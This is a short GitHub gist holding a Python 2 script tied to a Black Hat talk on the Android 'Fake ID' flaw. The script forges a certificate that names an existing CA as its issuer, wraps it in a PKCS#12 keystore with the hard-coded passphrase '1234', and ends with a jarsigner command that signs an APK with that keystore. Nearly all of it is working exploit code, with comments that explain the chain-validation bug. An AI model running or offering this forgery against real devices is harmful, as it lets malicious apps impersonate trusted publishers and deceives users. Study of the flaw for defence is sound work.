
@flankerhqd
Created August 18, 2014 02:52
fakeid CA script from BH presentation
import OpenSSL
from OpenSSL.crypto import *
# Purpose: build a PKCS#12 keystore (out.p12) around a certificate whose
# issuer field names an existing CA but whose signature is made with a
# freshly generated key rather than that CA's private key.
# A verifier that checks the certificate's signature against the issuer's
# public key will reject the result; only a verifier that links a chain by
# comparing issuer/subject names would accept it.
# NOTE(review): the gist title ties this to the "fakeid" Black Hat talk;
# presumably it is a test fixture for that class of chain-validation bug.
#
# The script is Python 2 (`print >>` syntax below) and uses pyOpenSSL's
# PKCS12 class. NOTE(review): confirm the installed pyOpenSSL still ships it.
#
#assume you've already generated client.cer
#extract CERT.RSA
#openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out cert.cer : CA cert isolated from RSA
# Load the CA certificate (PEM). Only its subject name and the certificate
# itself are used below; no CA private key is involved anywhere.
# The file handle is never closed explicitly.
cacert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('cert.cer','r').read())
# Fresh RSA key pair. 1024 bits is below current minimum key-size guidance;
# it is a hard-coded demo value here.
pk = OpenSSL.crypto.PKey()
pk.generate_key(OpenSSL.crypto.TYPE_RSA,1024)
#client.cer
# Load the existing client certificate and rewrite it in place.
oricert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('client.cer','r').read())
# Issuer name is copied from the CA's subject, so the certificate names the
# CA as its issuer.
oricert.set_issuer(cacert.get_subject())
# Public key is swapped for the freshly generated one.
oricert.set_pubkey(pk)
# Signed with the new key itself, so the signature does not verify under the
# CA's public key. SHA-1 is a deprecated digest for signatures.
oricert.sign(pk, "sha1")
# Bundle the private key, the rewritten certificate and the CA certificate
# into one PKCS#12 structure.
pkcs12 = OpenSSL.crypto.PKCS12()
pkcs12.set_privatekey(pk)
pkcs12.set_certificate(oricert)
pkcs12.set_ca_certificates([cacert])
# The export passphrase is the hard-coded literal '1234'.
finalPkcs12Data = pkcs12.export(passphrase='1234')
pp = load_pkcs12(finalPkcs12Data, '1234')#verify keystore: re-parse the export with the same passphrase; pp is not used afterwards
#store keystore
# Python 2 `print >>` appends a newline after the data, so out.p12 ends with
# one byte that is not part of the exported PKCS#12 blob. The file object is
# never closed explicitly.
print >> open('out.p12','wb'), finalPkcs12Data
#jarsigner -keystore out.p12 -storetype pkcs12 -sigalg SHA1withRSA -digestalg SHA1 app-debug.apk 1